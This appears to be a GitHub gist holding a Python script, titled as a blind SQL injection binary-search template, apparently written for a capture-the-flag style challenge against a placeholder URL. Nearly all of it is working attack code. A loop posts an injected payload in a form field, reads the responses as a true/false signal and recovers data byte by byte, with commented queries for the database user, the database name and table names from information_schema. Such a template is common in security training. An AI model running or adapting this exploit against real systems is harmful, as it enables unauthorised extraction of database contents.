Skip to content

Instantly share code, notes, and snippets.

@waderwu
Created May 23, 2020 15:58
Show Gist options
  • Save waderwu/32beeefb8ddd57e3f35752da1be89b6f to your computer and use it in GitHub Desktop.
Save waderwu/32beeefb8ddd57e3f35752da1be89b6f to your computer and use it in GitHub Desktop.
sqli blind binary search template
#!/usr/bin/env python3
import requests
client = requests.Session()
debug = False
def post(url, data, headers=None, proxy=False):
if not headers:
headers = {}
headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'
proxies = {'http':'http://127.0.0.1:8080'}
r = None
if debug:
r = client.post(url, data=data, headers=headers, proxies=proxies)
else:
r = client.post(url, data=data, headers=headers)
return r
def exp():
query = "select user()"
# query = "select database()"
# query = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
flag = "0x"
for index in range(1, 40):
print(index)
left = 0
right = 256
while left <= right:
guess = (left+right)//2
# print(guess, left, right)
tmp = flag + hex(guess)[2:]
payload = "xx1' or (select * from nocol where id=3) < (3, 0x666c6167, binary %s) or exp(999)#"%(tmp)
data = {'name':payload}
r = post(url, data=data)
# print(r.text)
if "wrong" in r.text:
left = guess + 1
else:
right = guess - 1
flag += hex(left-1)[2:]
print(bytes.fromhex(flag[2:]))
if __name__ == "__main__":
url = "http://xxxx/index.php"
exp()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment